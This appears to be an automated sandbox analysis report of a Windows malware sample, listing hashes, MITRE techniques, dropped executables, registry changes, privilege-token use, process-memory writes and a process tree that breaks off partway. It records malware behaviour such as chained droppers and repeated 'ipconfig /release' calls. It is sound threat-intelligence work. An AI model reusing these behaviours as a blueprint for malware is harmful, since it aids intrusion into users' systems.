a38a8a708c10cc37ffad39c9471a238177a411c15a10221195fd42f75774e53f

Analysis

max time kernel
150s
max time network
130s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
13-10-2024 08:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3eede8b06e6a2d4a041c6d2d2a6efc35_JaffaCakes118.exe
Size

361KB
MD5

3eede8b06e6a2d4a041c6d2d2a6efc35
SHA1

59caa7b8db93705e8bfc6d81be47e793c49b8a84
SHA256

a38a8a708c10cc37ffad39c9471a238177a411c15a10221195fd42f75774e53f
SHA512

882b6b94619ed6caeffc8c12e70ef8959bc915f35149f19a113aa88afd2dcf31e5ccabafb3236a8e1576361aaf7e8f1ab331e49c1538185f94661b417d31f6f8
SSDEEP

6144:4flfAsiL4lIJjiJcbI03GBc3ucY5DCSjX:4flfAsiVGjSGecvX

Score

7^/10

discovery

Malware Config

Signatures

Executes dropped EXE 64 IoCs

pid	Process
2084	qoidbvtnifaysmkf.exe
2900	CreateProcess.exe
2904	xsmkecwrpj.exe
2736	CreateProcess.exe
2620	CreateProcess.exe
2676	i_xsmkecwrpj.exe
2860	CreateProcess.exe
2796	wuomgbztrl.exe
532	CreateProcess.exe
1448	CreateProcess.exe
692	i_wuomgbztrl.exe
3004	CreateProcess.exe
2380	jgbztolgey.exe
2964	CreateProcess.exe
992	CreateProcess.exe
900	i_jgbztolgey.exe
2508	CreateProcess.exe
2528	geywqljdtn.exe
1724	CreateProcess.exe
2388	CreateProcess.exe
2096	i_geywqljdtn.exe
2872	CreateProcess.exe
1932	wqlidbvpni.exe
2924	CreateProcess.exe
580	CreateProcess.exe
2624	i_wqlidbvpni.exe
2892	CreateProcess.exe
1412	lfaysqkfcx.exe
2440	CreateProcess.exe
2672	CreateProcess.exe
320	i_lfaysqkfcx.exe
2864	CreateProcess.exe
1696	avsnhfzxsm.exe
1900	CreateProcess.exe
1016	CreateProcess.exe
1744	i_avsnhfzxsm.exe
2244	CreateProcess.exe
2108	usnkfzxrpk.exe
640	CreateProcess.exe
1208	CreateProcess.exe
552	i_usnkfzxrpk.exe
1180	CreateProcess.exe
2800	khczuomhez.exe
2984	CreateProcess.exe
3000	CreateProcess.exe
2216	i_khczuomhez.exe
2980	CreateProcess.exe
668	zuomgeztrl.exe
2656	CreateProcess.exe
3064	CreateProcess.exe
2916	i_zuomgeztrl.exe
2728	CreateProcess.exe
1668	ojgbztolge.exe
532	CreateProcess.exe
1992	CreateProcess.exe
1452	i_ojgbztolge.exe
1956	CreateProcess.exe
1764	pjdbwtoigb.exe
1964	CreateProcess.exe
1900	CreateProcess.exe
1984	i_pjdbwtoigb.exe
2276	CreateProcess.exe
3044	eytqljdyvq.exe
1708	CreateProcess.exe

Loads dropped DLL 62 IoCs

pid	Process
2388	3eede8b06e6a2d4a041c6d2d2a6efc35_JaffaCakes118.exe
2084	qoidbvtnifaysmkf.exe
2084	qoidbvtnifaysmkf.exe
2904	xsmkecwrpj.exe
2084	qoidbvtnifaysmkf.exe
2084	qoidbvtnifaysmkf.exe
2796	wuomgbztrl.exe
2084	qoidbvtnifaysmkf.exe
2084	qoidbvtnifaysmkf.exe
2380	jgbztolgey.exe
2084	qoidbvtnifaysmkf.exe
2084	qoidbvtnifaysmkf.exe
2528	geywqljdtn.exe
2084	qoidbvtnifaysmkf.exe
2084	qoidbvtnifaysmkf.exe
1932	wqlidbvpni.exe
2084	qoidbvtnifaysmkf.exe
2084	qoidbvtnifaysmkf.exe
1412	lfaysqkfcx.exe
2084	qoidbvtnifaysmkf.exe
2084	qoidbvtnifaysmkf.exe
1696	avsnhfzxsm.exe
2084	qoidbvtnifaysmkf.exe
2084	qoidbvtnifaysmkf.exe
2108	usnkfzxrpk.exe
2084	qoidbvtnifaysmkf.exe
2084	qoidbvtnifaysmkf.exe
2800	khczuomhez.exe
2084	qoidbvtnifaysmkf.exe
2084	qoidbvtnifaysmkf.exe
668	zuomgeztrl.exe
2084	qoidbvtnifaysmkf.exe
2084	qoidbvtnifaysmkf.exe
1668	ojgbztolge.exe
2084	qoidbvtnifaysmkf.exe
2084	qoidbvtnifaysmkf.exe
1764	pjdbwtoigb.exe
2084	qoidbvtnifaysmkf.exe
2084	qoidbvtnifaysmkf.exe
3044	eytqljdyvq.exe
2084	qoidbvtnifaysmkf.exe
2084	qoidbvtnifaysmkf.exe
2176	tnlfdysqki.exe
2084	qoidbvtnifaysmkf.exe
2084	qoidbvtnifaysmkf.exe
1240	qnaysnkfcx.exe
2084	qoidbvtnifaysmkf.exe
2084	qoidbvtnifaysmkf.exe
688	icavsnhfzx.exe
2084	qoidbvtnifaysmkf.exe
2084	qoidbvtnifaysmkf.exe
2308	xspkicwupm.exe
2084	qoidbvtnifaysmkf.exe
2084	qoidbvtnifaysmkf.exe
2476	nhczusmgez.exe
2084	qoidbvtnifaysmkf.exe
2084	qoidbvtnifaysmkf.exe
1836	kezxrpjebw.exe
2084	qoidbvtnifaysmkf.exe
2084	qoidbvtnifaysmkf.exe
752	zxrmjebwqo.exe
2084	qoidbvtnifaysmkf.exe

System Location Discovery: System Language Discovery 1 TTPs 23 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	zuomgeztrl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	eytqljdyvq.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	qnaysnkfcx.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	kezxrpjebw.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wuomgbztrl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	lfaysqkfcx.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	usnkfzxrpk.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	khczuomhez.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pjdbwtoigb.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xspkicwupm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	qoidbvtnifaysmkf.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xsmkecwrpj.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wqlidbvpni.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ojgbztolge.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tnlfdysqki.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icavsnhfzx.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nhczusmgez.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3eede8b06e6a2d4a041c6d2d2a6efc35_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	jgbztolgey.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	avsnhfzxsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	geywqljdtn.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	zxrmjebwqo.exe

Gathers network information 2 TTPs 20 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
2652	ipconfig.exe
2636	ipconfig.exe
2896	ipconfig.exe
3008	ipconfig.exe
2328	ipconfig.exe
2500	ipconfig.exe
388	ipconfig.exe
2836	ipconfig.exe
1516	ipconfig.exe
1968	ipconfig.exe
2288	ipconfig.exe
112	ipconfig.exe
2252	ipconfig.exe
1912	ipconfig.exe
1640	ipconfig.exe
1776	ipconfig.exe
1232	ipconfig.exe
3012	ipconfig.exe
1532	ipconfig.exe
2072	ipconfig.exe

Modifies Internet Explorer settings 1 TTPs 34 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000303eef0e2cd1a9499efdd285a56ddc500000000002000000000010660000000100002000000067200a2041dc15c2ea92b8ef3b95cd8df8d3a0fc5ef1093e2cf827a805046270000000000e80000000020000200000008db32ff27e6faf29d52da0e746acef7920d7e518c25283ce3d7db1f5b9e6b09120000000240bbd77f84c4c19eabd2aed278dcb85632893a536a3624e5b0f30fd429785d9400000006d17cf210091c3f8a2396e1db43c80872b1d8645246d1e2a340ea9ddad8ec7ec54285fe7b2e1b14b0b161e788bf1f6923f4e3810ff3bf5075fead7df3021b5db	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "434971575"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{D8670871-8940-11EF-B40F-EAF82BEC9AF0} = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 505831b14d1ddb01	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000303eef0e2cd1a9499efdd285a56ddc5000000000020000000000106600000001000020000000225cad0a271288a95360de42ea20bb37481765c1c2cc90a8fea9bd5fc10f249b000000000e80000000020000200000004a28960e1946df038b4e286e7d821595ca7eb425febf0c42db8158ea5909e7fb90000000dc0eed648a51ab2acc4b1b199b8182b9a0d52e137de79c383129eeccf0bfaec8f907baf49d9f31657b00b8915155b8134d0a1755dd7de99ef74f3910d0e56aed9239410e1bd0470f4bf236f665bac4824b2c46e0d0dd1cf26e3642793740f59b4665203a28b73587c0d03ceca7d836ee277aef315fe8f9e7f1199d60a44f1ce88d0b2148e57f7a632091ab8b0a6cf24d40000000a09007fdae0d757ae33b6719f38c3f2a53e8fdb838258691b8dd7a17f9ea7dce2da2aa1ca2953d626f6a2727d1145bcb3407cbcb87212b9dd5dada371695c767	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2388	3eede8b06e6a2d4a041c6d2d2a6efc35_JaffaCakes118.exe
2388	3eede8b06e6a2d4a041c6d2d2a6efc35_JaffaCakes118.exe
2388	3eede8b06e6a2d4a041c6d2d2a6efc35_JaffaCakes118.exe
2388	3eede8b06e6a2d4a041c6d2d2a6efc35_JaffaCakes118.exe
2388	3eede8b06e6a2d4a041c6d2d2a6efc35_JaffaCakes118.exe
2388	3eede8b06e6a2d4a041c6d2d2a6efc35_JaffaCakes118.exe
2388	3eede8b06e6a2d4a041c6d2d2a6efc35_JaffaCakes118.exe
2388	3eede8b06e6a2d4a041c6d2d2a6efc35_JaffaCakes118.exe
2388	3eede8b06e6a2d4a041c6d2d2a6efc35_JaffaCakes118.exe
2388	3eede8b06e6a2d4a041c6d2d2a6efc35_JaffaCakes118.exe
2388	3eede8b06e6a2d4a041c6d2d2a6efc35_JaffaCakes118.exe
2388	3eede8b06e6a2d4a041c6d2d2a6efc35_JaffaCakes118.exe
2388	3eede8b06e6a2d4a041c6d2d2a6efc35_JaffaCakes118.exe
2388	3eede8b06e6a2d4a041c6d2d2a6efc35_JaffaCakes118.exe
2388	3eede8b06e6a2d4a041c6d2d2a6efc35_JaffaCakes118.exe
2388	3eede8b06e6a2d4a041c6d2d2a6efc35_JaffaCakes118.exe
2388	3eede8b06e6a2d4a041c6d2d2a6efc35_JaffaCakes118.exe
2388	3eede8b06e6a2d4a041c6d2d2a6efc35_JaffaCakes118.exe
2388	3eede8b06e6a2d4a041c6d2d2a6efc35_JaffaCakes118.exe
2388	3eede8b06e6a2d4a041c6d2d2a6efc35_JaffaCakes118.exe
2388	3eede8b06e6a2d4a041c6d2d2a6efc35_JaffaCakes118.exe
2388	3eede8b06e6a2d4a041c6d2d2a6efc35_JaffaCakes118.exe
2084	qoidbvtnifaysmkf.exe
2388	3eede8b06e6a2d4a041c6d2d2a6efc35_JaffaCakes118.exe
2084	qoidbvtnifaysmkf.exe
2084	qoidbvtnifaysmkf.exe
2388	3eede8b06e6a2d4a041c6d2d2a6efc35_JaffaCakes118.exe
2084	qoidbvtnifaysmkf.exe
2388	3eede8b06e6a2d4a041c6d2d2a6efc35_JaffaCakes118.exe
2084	qoidbvtnifaysmkf.exe
2084	qoidbvtnifaysmkf.exe
2388	3eede8b06e6a2d4a041c6d2d2a6efc35_JaffaCakes118.exe
2084	qoidbvtnifaysmkf.exe
2388	3eede8b06e6a2d4a041c6d2d2a6efc35_JaffaCakes118.exe
2388	3eede8b06e6a2d4a041c6d2d2a6efc35_JaffaCakes118.exe
2904	xsmkecwrpj.exe
2904	xsmkecwrpj.exe
2904	xsmkecwrpj.exe
2904	xsmkecwrpj.exe
2904	xsmkecwrpj.exe
2904	xsmkecwrpj.exe
2904	xsmkecwrpj.exe
2676	i_xsmkecwrpj.exe
2676	i_xsmkecwrpj.exe
2676	i_xsmkecwrpj.exe
2676	i_xsmkecwrpj.exe
2676	i_xsmkecwrpj.exe
2676	i_xsmkecwrpj.exe
2676	i_xsmkecwrpj.exe
2796	wuomgbztrl.exe
2796	wuomgbztrl.exe
2796	wuomgbztrl.exe
2796	wuomgbztrl.exe
2796	wuomgbztrl.exe
2796	wuomgbztrl.exe
2796	wuomgbztrl.exe
692	i_wuomgbztrl.exe
692	i_wuomgbztrl.exe
692	i_wuomgbztrl.exe
692	i_wuomgbztrl.exe
692	i_wuomgbztrl.exe
692	i_wuomgbztrl.exe
692	i_wuomgbztrl.exe
2380	jgbztolgey.exe

Suspicious behavior: LoadsDriver 21 IoCs

pid	Process
480	Process not Found
480	Process not Found
480	Process not Found
480	Process not Found
480	Process not Found
480	Process not Found
480	Process not Found
480	Process not Found
480	Process not Found
480	Process not Found
480	Process not Found
480	Process not Found
480	Process not Found
480	Process not Found
480	Process not Found
480	Process not Found
480	Process not Found
480	Process not Found
480	Process not Found
480	Process not Found
480	Process not Found

Suspicious use of AdjustPrivilegeToken 20 IoCs

description	pid	Process
Token: SeDebugPrivilege	2676	i_xsmkecwrpj.exe
Token: SeDebugPrivilege	692	i_wuomgbztrl.exe
Token: SeDebugPrivilege	900	i_jgbztolgey.exe
Token: SeDebugPrivilege	2096	i_geywqljdtn.exe
Token: SeDebugPrivilege	2624	i_wqlidbvpni.exe
Token: SeDebugPrivilege	320	i_lfaysqkfcx.exe
Token: SeDebugPrivilege	1744	i_avsnhfzxsm.exe
Token: SeDebugPrivilege	552	i_usnkfzxrpk.exe
Token: SeDebugPrivilege	2216	i_khczuomhez.exe
Token: SeDebugPrivilege	2916	i_zuomgeztrl.exe
Token: SeDebugPrivilege	1452	i_ojgbztolge.exe
Token: SeDebugPrivilege	1984	i_pjdbwtoigb.exe
Token: SeDebugPrivilege	2304	i_eytqljdyvq.exe
Token: SeDebugPrivilege	2996	i_tnlfdysqki.exe
Token: SeDebugPrivilege	272	i_qnaysnkfcx.exe
Token: SeDebugPrivilege	2484	i_icavsnhfzx.exe
Token: SeDebugPrivilege	2384	i_xspkicwupm.exe
Token: SeDebugPrivilege	796	i_nhczusmgez.exe
Token: SeDebugPrivilege	2768	i_kezxrpjebw.exe
Token: SeDebugPrivilege	2624	i_zxrmjebwqo.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2104	iexplore.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
2104	iexplore.exe
2104	iexplore.exe
2412	IEXPLORE.EXE
2412	IEXPLORE.EXE
2412	IEXPLORE.EXE
2412	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2388 wrote to memory of 2084	2388	3eede8b06e6a2d4a041c6d2d2a6efc35_JaffaCakes118.exe	30
PID 2388 wrote to memory of 2084	2388	3eede8b06e6a2d4a041c6d2d2a6efc35_JaffaCakes118.exe	30
PID 2388 wrote to memory of 2084	2388	3eede8b06e6a2d4a041c6d2d2a6efc35_JaffaCakes118.exe	30
PID 2388 wrote to memory of 2084	2388	3eede8b06e6a2d4a041c6d2d2a6efc35_JaffaCakes118.exe	30
PID 2388 wrote to memory of 2104	2388	3eede8b06e6a2d4a041c6d2d2a6efc35_JaffaCakes118.exe	31
PID 2388 wrote to memory of 2104	2388	3eede8b06e6a2d4a041c6d2d2a6efc35_JaffaCakes118.exe	31
PID 2388 wrote to memory of 2104	2388	3eede8b06e6a2d4a041c6d2d2a6efc35_JaffaCakes118.exe	31
PID 2388 wrote to memory of 2104	2388	3eede8b06e6a2d4a041c6d2d2a6efc35_JaffaCakes118.exe	31
PID 2104 wrote to memory of 2412	2104	iexplore.exe	32
PID 2104 wrote to memory of 2412	2104	iexplore.exe	32
PID 2104 wrote to memory of 2412	2104	iexplore.exe	32
PID 2104 wrote to memory of 2412	2104	iexplore.exe	32
PID 2084 wrote to memory of 2900	2084	qoidbvtnifaysmkf.exe	33
PID 2084 wrote to memory of 2900	2084	qoidbvtnifaysmkf.exe	33
PID 2084 wrote to memory of 2900	2084	qoidbvtnifaysmkf.exe	33
PID 2084 wrote to memory of 2900	2084	qoidbvtnifaysmkf.exe	33
PID 2904 wrote to memory of 2736	2904	xsmkecwrpj.exe	36
PID 2904 wrote to memory of 2736	2904	xsmkecwrpj.exe	36
PID 2904 wrote to memory of 2736	2904	xsmkecwrpj.exe	36
PID 2904 wrote to memory of 2736	2904	xsmkecwrpj.exe	36
PID 2084 wrote to memory of 2620	2084	qoidbvtnifaysmkf.exe	39
PID 2084 wrote to memory of 2620	2084	qoidbvtnifaysmkf.exe	39
PID 2084 wrote to memory of 2620	2084	qoidbvtnifaysmkf.exe	39
PID 2084 wrote to memory of 2620	2084	qoidbvtnifaysmkf.exe	39
PID 2084 wrote to memory of 2860	2084	qoidbvtnifaysmkf.exe	42
PID 2084 wrote to memory of 2860	2084	qoidbvtnifaysmkf.exe	42
PID 2084 wrote to memory of 2860	2084	qoidbvtnifaysmkf.exe	42
PID 2084 wrote to memory of 2860	2084	qoidbvtnifaysmkf.exe	42
PID 2796 wrote to memory of 532	2796	wuomgbztrl.exe	44
PID 2796 wrote to memory of 532	2796	wuomgbztrl.exe	44
PID 2796 wrote to memory of 532	2796	wuomgbztrl.exe	44
PID 2796 wrote to memory of 532	2796	wuomgbztrl.exe	44
PID 2084 wrote to memory of 1448	2084	qoidbvtnifaysmkf.exe	47
PID 2084 wrote to memory of 1448	2084	qoidbvtnifaysmkf.exe	47
PID 2084 wrote to memory of 1448	2084	qoidbvtnifaysmkf.exe	47
PID 2084 wrote to memory of 1448	2084	qoidbvtnifaysmkf.exe	47
PID 2084 wrote to memory of 3004	2084	qoidbvtnifaysmkf.exe	49
PID 2084 wrote to memory of 3004	2084	qoidbvtnifaysmkf.exe	49
PID 2084 wrote to memory of 3004	2084	qoidbvtnifaysmkf.exe	49
PID 2084 wrote to memory of 3004	2084	qoidbvtnifaysmkf.exe	49
PID 2380 wrote to memory of 2964	2380	jgbztolgey.exe	51
PID 2380 wrote to memory of 2964	2380	jgbztolgey.exe	51
PID 2380 wrote to memory of 2964	2380	jgbztolgey.exe	51
PID 2380 wrote to memory of 2964	2380	jgbztolgey.exe	51
PID 2084 wrote to memory of 992	2084	qoidbvtnifaysmkf.exe	54
PID 2084 wrote to memory of 992	2084	qoidbvtnifaysmkf.exe	54
PID 2084 wrote to memory of 992	2084	qoidbvtnifaysmkf.exe	54
PID 2084 wrote to memory of 992	2084	qoidbvtnifaysmkf.exe	54
PID 2084 wrote to memory of 2508	2084	qoidbvtnifaysmkf.exe	56
PID 2084 wrote to memory of 2508	2084	qoidbvtnifaysmkf.exe	56
PID 2084 wrote to memory of 2508	2084	qoidbvtnifaysmkf.exe	56
PID 2084 wrote to memory of 2508	2084	qoidbvtnifaysmkf.exe	56
PID 2528 wrote to memory of 1724	2528	geywqljdtn.exe	58
PID 2528 wrote to memory of 1724	2528	geywqljdtn.exe	58
PID 2528 wrote to memory of 1724	2528	geywqljdtn.exe	58
PID 2528 wrote to memory of 1724	2528	geywqljdtn.exe	58
PID 2084 wrote to memory of 2388	2084	qoidbvtnifaysmkf.exe	61
PID 2084 wrote to memory of 2388	2084	qoidbvtnifaysmkf.exe	61
PID 2084 wrote to memory of 2388	2084	qoidbvtnifaysmkf.exe	61
PID 2084 wrote to memory of 2388	2084	qoidbvtnifaysmkf.exe	61
PID 2084 wrote to memory of 2872	2084	qoidbvtnifaysmkf.exe	63
PID 2084 wrote to memory of 2872	2084	qoidbvtnifaysmkf.exe	63
PID 2084 wrote to memory of 2872	2084	qoidbvtnifaysmkf.exe	63
PID 2084 wrote to memory of 2872	2084	qoidbvtnifaysmkf.exe	63

C:\Users\Admin\AppData\Local\Temp\3eede8b06e6a2d4a041c6d2d2a6efc35_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\3eede8b06e6a2d4a041c6d2d2a6efc35_JaffaCakes118.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2388
- C:\Temp\qoidbvtnifaysmkf.exe
  C:\Temp\qoidbvtnifaysmkf.exe run
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2084
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\xsmkecwrpj.exe ups_run
    3⤵
    - Executes dropped EXE
    PID:2900
  - - C:\Temp\xsmkecwrpj.exe
      C:\Temp\xsmkecwrpj.exe ups_run
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:2904
    - - C:\temp\CreateProcess.exe
        
        C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
        5⤵
        Executes dropped EXE
        
        PID:2736
      - C:\windows\system32\ipconfig.exe
        
        C:\windows\system32\ipconfig.exe /release
        6⤵
        Gathers network information
        
        PID:2652
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\i_xsmkecwrpj.exe ups_ins
    3⤵
    - Executes dropped EXE
    PID:2620
  - - C:\Temp\i_xsmkecwrpj.exe
      C:\Temp\i_xsmkecwrpj.exe ups_ins
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2676
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\wuomgbztrl.exe ups_run
    3⤵
    - Executes dropped EXE
    PID:2860
  - - C:\Temp\wuomgbztrl.exe
      C:\Temp\wuomgbztrl.exe ups_run
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:2796
    - - C:\temp\CreateProcess.exe
        
        C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
        5⤵
        Executes dropped EXE
        
        PID:532
      - C:\windows\system32\ipconfig.exe
        
        C:\windows\system32\ipconfig.exe /release
        6⤵
        Gathers network information
        
        PID:2500
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\i_wuomgbztrl.exe ups_ins
    3⤵
    - Executes dropped EXE
    PID:1448
  - - C:\Temp\i_wuomgbztrl.exe
      C:\Temp\i_wuomgbztrl.exe ups_ins
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:692
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\jgbztolgey.exe ups_run
    3⤵
    - Executes dropped EXE
    PID:3004
  - - C:\Temp\jgbztolgey.exe
      C:\Temp\jgbztolgey.exe ups_run
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:2380
    - - C:\temp\CreateProcess.exe
        
